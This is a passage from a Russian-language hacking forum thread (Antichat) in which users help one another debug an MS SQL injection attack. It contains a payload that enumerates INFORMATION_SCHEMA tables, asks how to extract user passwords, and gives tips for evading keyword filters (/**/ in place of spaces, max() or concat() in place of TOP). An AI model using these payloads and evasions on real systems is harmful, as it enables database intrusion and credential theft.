HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 08.02.2008, 07:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Просто нет походу ничего в этой табличке, т.е. запрос ничего не возвращает
__________________
Карфаген должен быть разрушен...
 

  #42  
Старый 17.02.2008, 20:15
Кельт
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами: 9923439

Репутация: 22
По умолчанию

Вот с поvощью инъекции можно узнать логин пользователя, а можно ли его пасс узнать?
И еще как можно обойти вот такое:
Код:
Incorrect syntax near
Оно не дает использовать top, from, bcp, exec =(
 

  #43  
Старый 17.02.2008, 21:19
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Кельт, фразу дальше мейби продлишь?
Неверный запрос ты составил вообще
Пароль можно вытащить если он в бд в незашифрованном виде...
 

  #44  
Старый 17.02.2008, 21:32
Кельт
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами: 9923439

Репутация: 22
По умолчанию

Фразу я не продлил потому как она на все перечисленные ниже слова ругается, к примеру, на запрос вида:
or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
вылетает ошибка:
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
 

  #45  
Старый 18.02.2008, 01:33
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Ну правильно....плюсы замени например на /**/
 

  #46  
Старый 18.02.2008, 01:49
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами: 10488959

Репутация: 474
По умолчанию

>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
 

  #47  
Старый 18.02.2008, 01:59
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от ENFIX  
>плюсы замени например на /**/
Mssql не поддерживает, если я не ошибаюсь, такой тип комментария
Поддерживает, но обязательно что бы они были закрытыми, пробел так же можно заменить на /**/

2Кельт, иногда top фильтруется попробуй замени на max(table_name)
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 18.02.2008 в 02:02..
 

  #48  
Старый 18.02.2008, 12:58
Кельт
Новичок
Регистрация: 04.07.2007
Сообщений: 16
С нами: 9923439

Репутация: 22
По умолчанию

что-то не помогает =(
при замене + на /**/ выдает:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near '/'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource

При использовании max(table_name) начинает ругаться на from:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'from'. (severity 15)
Warning: mssql_query() [function.mssql-query]: Query failed
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
 

  #49  
Старый 18.02.2008, 14:17
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

Поппробуй concat(table_name, 0x3a) заместо max(table_name)
 

  #50  
Старый 18.02.2008, 14:45
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Разве функция max() предназначена для строковых полей?

ЗЫ. Сорри, ступил, для них она тоже работает)

Последний раз редактировалось krypt3r; 18.02.2008 в 15:08..
 
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Os - моя крепость Elekt Избранное 32 06.08.2009 15:10
Мнения: "Безопасность от Microsoft: шаг к обновленному миру?" dinar_007 Мировые новости. Обсуждения. 5 25.12.2006 19:20
Дыра в Word позволяет захватить контроль над ПК »Atom1c« Мировые новости. Обсуждения. 17 12.12.2006 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.